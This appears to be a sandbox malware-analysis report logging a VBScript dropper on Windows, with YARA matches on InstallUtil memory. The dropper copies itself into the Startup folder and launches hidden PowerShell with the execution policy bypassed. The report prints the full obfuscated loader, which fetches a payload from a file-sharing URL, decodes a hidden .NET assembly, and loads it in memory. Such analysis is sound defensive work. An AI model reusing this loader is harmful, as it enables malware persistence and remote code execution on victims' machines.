                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")Set FSO = CreateObject("Scripting.FileSystemObject")HgNH = WshShell.CurrentDirectory & "\" & WScript.ScriptNamedyKH = "CJJ.vbs" if true then strStartupFolder = WshShell.SpecialFolders("Startup") strDestFile = strStartupFolder & "\" & dyKH If Not FSO.FileExists(strDestFile) Then FSO.CopyFile HgNH, strDestFile End If OkCZ = ")'sbv." & dyKH & " \putratS\smargorP\uneM tratS\swodniW\tfosorciM\gnimaoR\ataDppA\'" OkCZ = StrReverse(OkCZ) ZKIu = "[System.IO.File]::Copy('" & HgNH & "', 'C:\Users\' + [Environment]::UserName + '" & OkCZ & "')" NWCN = "cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command " & ZKIu WshShell.Run NWCN, 0, trueEnd If On Error Resume Next vnqhv = "JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlZQFOEDIRUYCMKBShZaHRZQFOEDIRUYCMKBS0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lZQFOEDIRUYCMKBSsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEZQFOEDIRUYCMKBSM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIZQFOEDIRUYCMKBSyMDljNj" vnqhv = vnqhv & "JjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTZQFOEDIRUYCMKBSeXN0ZZQFOEDIRUYCMKBSW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzIZQFOEDIRUYCMKBSD0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZQFOEDIRUYCMKBSZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbZQFOEDIRUYCMKBSmcoUGhS" vnqhv = vnqhv & "aW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZQFOEDIRUYCMKBSZYWTtZQFOEDIRUYCMKBSQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5ZQFOEDIRUYCMKBSmWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSWZQFOEDIRUYCMKBS5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJZQFOEDIRUYCMKBSlbmRGbG" vnqhv = vnqhv & "EnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0ZQFOEDIRUYCMKBSYXJ0SZQFOEDIRUYCMKBSW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndZQFOEDIRUYCMKBSGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDZQFOEDIRUYCMKBSb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZZQFOEDIRUYCMKBSyhQaFJz" vnqhv = vnqhv & "dGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWZQFOEDIRUYCMKBSpvaW4ZQFOEDIRUYCMKBSgKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBZQFOEDIRUYCMKBS1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWZQFOEDIRUYCMKBSFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XToZQFOEDIRUYCMKBS6RnJvbU" vnqhv = vnqhv & "Jhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgZQFOEDIRUYCMKBSPSBbUZQFOEDIRUYCMKBS3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKZQFOEDIRUYCMKBSFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpZQFOEDIRUYCMKBSO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQZQFOEDIRUYCMKBSChmWFl0" vnqhv = vnqhv & "eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmZQFOEDIRUYCMKBSFk
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348000BD pushad ; iretd 5_2_00007FFD348000C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34804FF3 push eax; retf 5_2_00007FFD34804FE9

                        Boot Survival

                        barindex
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.InstallUtil.exe.406d60.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
